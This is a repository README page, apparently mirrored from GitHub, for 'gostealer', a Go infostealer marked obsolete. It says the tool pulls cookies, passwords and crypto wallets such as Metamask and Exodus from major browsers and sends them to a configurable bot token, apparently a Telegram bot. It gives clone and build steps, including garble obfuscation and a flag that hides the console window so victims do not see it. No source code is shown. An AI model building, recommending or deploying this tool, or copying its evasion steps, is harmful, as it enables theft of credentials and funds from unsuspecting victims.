4kord / gostealer

(OBSOLETE) Gostealer decodes and sends all cookies, passwords and cryptocurrency wallets from chromium (and not only) browsers.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Gostealer

Gostealer decodes and sends all cookies, passwords and cryptocurrency wallets from chromium (and not only) browsers.

License

Telegram

Supported browsers

  • Chrome
  • Edge
  • Firefox
  • Opera
  • OperaGX

Supported cryptocurrency wallets

  • Atomic
  • Binancechain
  • Electrum
  • Exodus
  • Metamask
  • Phantom
  • Ronin
  • Tronlink

Installation

From source

  • Clone the repo
# You must have git preinstalled
git clone https://github.com/4kord/gostealer.git
  • Install Go
# For Debian (Ubuntu, Xubuntu etc)
apt install golang

# For Arch (Endeavour, Manjaro etc)
pacman -S golang

# For macOS
brew install golang
  • Build
# Change current directory to the cloned one and build
cd gostealer
garble -seed=random build

# If you don't want to show the terminal use -ldflags -H=windowsgui
garble -seed=random build -ldflags -H=windowsguid

And that's it!

Look at this repository to find out how to install garble

Configuration

You might want to change bot token and archive password before building. Rename .env.example to .env and change values you need.

About

(OBSOLETE) Gostealer decodes and sends all cookies, passwords and cryptocurrency wallets from chromium (and not only) browsers.

License:MIT License


Languages

Language:Go 99.8%Language:Shell 0.2%